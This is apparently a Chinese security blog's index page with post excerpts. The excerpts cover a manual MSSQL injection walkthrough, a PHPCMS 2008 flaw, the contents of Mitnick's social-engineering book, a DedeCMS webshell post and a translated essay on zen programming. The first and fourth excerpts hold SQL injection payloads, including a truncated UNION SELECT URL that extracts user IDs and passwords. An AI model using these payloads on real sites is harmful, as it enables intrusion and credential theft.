一次失败的手工MSSQL注入笔记(犹如教科书般的MSSQL注入教程)

昨天k0n9基友扔过一个站来。aspx+mssql程序 (;" 用来分离两个语句,而"--"就是注释符,在它后面的语句都不执行!在后面不要问我为什么加步骤一、‘and 1=1 报错’ and '1'='1正常返回正常即可说明是sa权限哇!!!!!激动一番步骤三、接下来看看SQL版本吧。' and 1=convert(int,@@version)--好吧支持。试试执行命令把。命令个各种可以执行。但是

- 阅读全文 -

PHPCMS 2008 最新漏洞(第二季)

说好的第二季来了……组织:http://www.safekeyer.com/(欢迎访问)author:西毒blog:http://hi.baidu.com/sethc5其实还是有蛮多漏洞的,只是我一步步来吧!你们别催,该放的时候自然就会放了.过程不明显的我就省略了。在preview.php中第7行$r=new_stripslashes($info);我们跟踪new_stripslashes这个函数

- 阅读全文 -

凯文米特尼克欺骗的艺术Doc版

目录序前言内容介绍第一部分 幕后的故事第一章 安全软肋第二部分 攻击者的手段第二章 无害信息的价值第三章 正面攻击—直接索取第四章 建立信任第五章 我来帮你第六章 你能帮我吗?第七章 假冒网站和危险附件第八章 利用同情、内疚和胁迫第九章 逆向骗局第三部分 入侵警报第十章  进入内部第十一章 综合技术与社会工程学第十二章 攻击新进员工第十三章 聪明的骗局第十四章 商业间谍第四部分 加强防范第十五章 

- 阅读全文 -

记某一织梦CMS拿webshell

用/plus/search.php?keyword=astypeArr[111%3D@%60\%27%60%29+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+%60

- 阅读全文 -

[译文] 程序员的禅修之路

前言做一名禅修程序员意味着什么?那意味着,你要持守我从禅宗 习得的10条戒律,它们与计算机程序员的现代世界息息相关。早晨,外面下着雨,我发觉自己正坐在办公桌上琢磨有关高效率工作(efficient working)的问题。在我成为自由职业者之前的那些日子,尽管做了许多工作,然而回首往昔,不过是一片狼藉罢了。回想2006年我开始禅修之际,当时有好一阵子,这种念头清晰地浮现在我的脑海里:几百年前,老禅

- 阅读全文 -